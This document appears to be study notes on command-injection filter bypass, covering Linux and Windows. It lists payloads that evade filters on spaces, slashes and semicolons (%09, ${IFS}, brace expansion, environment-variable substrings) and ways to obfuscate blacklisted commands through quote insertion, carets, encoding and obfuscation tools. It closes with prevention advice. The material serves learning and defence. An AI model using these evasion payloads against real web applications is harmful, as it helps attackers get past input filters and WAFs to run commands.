filter-bypass
Bypassing space filters (linux)
METHOD1
Using Tabs
Try adding one character at a time and see which one is not blacklisted.
If the space character is blocked, we can use a tab, which works on both Linux and Windows.
%0a%09 # newline and tab
%09 # tab
%20 # space
METHOD2
Using $IFS. $IFS is a Linux environment variable whose default value is a space and a tab, so it may also work.
%0a${IFS}
${IFS}
$IFS
$IFS$9
METHOD3
Using Brace Expansion
We can use the brace expansion feature, which automatically adds spaces between the arguments wrapped in braces.
{ls,-la}
%0a{ls,-la}
Bypass slash/add slashes (linux)
Print environment variables
env, printenv
We can add slashes using environment variables
${PATH:0:1}
We can do the same with $HOME or $PWD
${LS_COLORS:10:1}
NOTE: you can look at the environment variables to find useful characters.
Bypass semi-colon/add semi-colon (linux)
Character shifting
man ascii
echo $(tr '!-}' '"-~'<<<[)
Windows
Bypass slashes/add slashes
CMD
echo %HOMEPATH:~6,-11%
Powershell
$env:HOMEPATH[0]
We can also use Get-ChildItem Env:
Bypassing blacklisted commands
Bypass command blacklist:
Using single and double quotes (windows & linux)
w'h'o'am'i
w"h"o"am"i
Note: we cannot mix types of quotes and the number of quotes must be even.
Using positional parameters and backslashes (linux):
w\ho\am\i
who$@ami
Using caret character (windows CMD):
wh^o^am^i
Advanced command obfuscation (Dealing with WAF)
Linux systems are case-sensitive
Case manipulation:
Windows Powershell
Alternate between upper and lower case (PowerShell is case-insensitive).
Linux
Reversed commands:
Linux
Windows powershell
Encoded commands:
This time, we create our own unique obfuscated commands, which are much less likely to be denied by a filter or a WAF. We can use various encoding tools, such as base64 or xxd (hex encoding).
Linux:
Base64
Utf-16 and base64
This converts the string from UTF-8 to UTF-16 before base64-encoding it.
We use <<< to avoid using a pipe |, which is a filtered character.
If base64 or bash is filtered, we can use character insertion, or alternatives such as sh and openssl, or xxd for encoding.
Windows powershell:
Base64
Other techniques
Automated obfuscation tools
Bashfuscator (linux)
DOSfuscation (windows)
Import-DOSfuscation - Help - Try running obfuscated command on CMD
Command injection Prevention
System commands
Input validation
filter_var function in PHP
Use regular expression
is-ip library in NodeJS
Input sanitization
preg_replace('/[^A-Za-z0-9.]/', '', $_GET['ip']); (PHP): removes special characters
dompurify library in NodeJS
Use the escapeshellcmd filter to escape any special characters so they cannot cause injections. For NodeJS, we can simply use the escape(ip) function. However, as we have seen in this module, escaping special characters is usually not considered a secure practice, as it can often be bypassed through various techniques.
Server configuration
Use the web server's built-in WAF, e.g. mod_security.
Abide by the Principle of Least Privilege (PoLP) by running the web server as a low-privileged user.
Prevent certain functions from being executed by the web server (disable_functions=system,……)
Limit the scope accessible by the web application to its folder (e.g. in PHP open_basedir='/var/www/html').
Reject double-encoded requests and non-ASCII characters in URLs.
Avoid the use of sensitive/outdated libraries and modules (e.g. PHP CGI).